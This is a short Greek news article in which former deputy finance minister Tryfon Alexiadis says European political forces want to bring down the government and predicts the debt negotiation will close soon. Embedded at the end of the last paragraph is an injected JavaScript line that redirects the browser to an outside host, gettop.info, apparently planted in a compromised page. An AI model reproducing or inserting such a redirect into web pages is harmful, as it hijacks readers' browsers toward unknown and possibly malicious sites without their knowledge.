Αλεξιάδης: Πολιτικές δυνάμεις στην Ευρώπη θέλουν να ρίξουν την κυβέρνηση

0
3

 

«Πολιτικές δυνάμεις στην Ευρώπη που δεν θέλουν την πολιτική λύση της κυβέρνησης, θέλουν να τη ρίξουν, και να επαναφέρουν το παλιό καθεστώς» κατήγγειλε τη Δευτέρα ο τέως αναπληρωτής υπουργός Οικονομικών, Τρύφων Αλεξιάδης.

Mιλώντας στον Real FM, o κ. Αλεξιάδης εκτίμησε πως «υπάρχουν δυνάμεις που δεν θέλουν τον πολίτικο διάδρομο που έχει ανοίξει αυτή η κυβέρνηση».

Μίλησε «για πολιτικά παιχνίδια και πολιτικές ισορροπίες σε επίπεδο Ευρώπης με τις οποίες η κυβέρνηση θα αναμετρηθεί και θα δώσει λύση» χωρίς όμως να απαντά αν εννοεί τον Βόλφγκανγκ Σόιμπλε.

«Αν δεν συμφωνηθούν όλα δεν έχει συμφωνηθεί τίποτε… δεν μπορούμε να λέμε για ‘’ολίγον συμφωνία’’» δήλωσε δε, επικαλούμενος και σχετική δήλωση του κυβερνητικού εκπροσώπου Δημήτρη Τζανακόπουλου.

Πάντως, ο κ. Αλεξιάδης προέβλεψε ότι η διαπραγμάτευση βρίσκεται στο τέλος, της έχουν απομείνει κάποια τεχνικά ζητήματα και θα κλείσει γρήγορα.

«Δεν υπάρχει δυνατότητα για νέα μέτρα και το επόμενο διάστημα θα προχωρήσουμε σε αυτά που έχουμε δεσμευτεί» διαβεβαίωσε ακόμη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here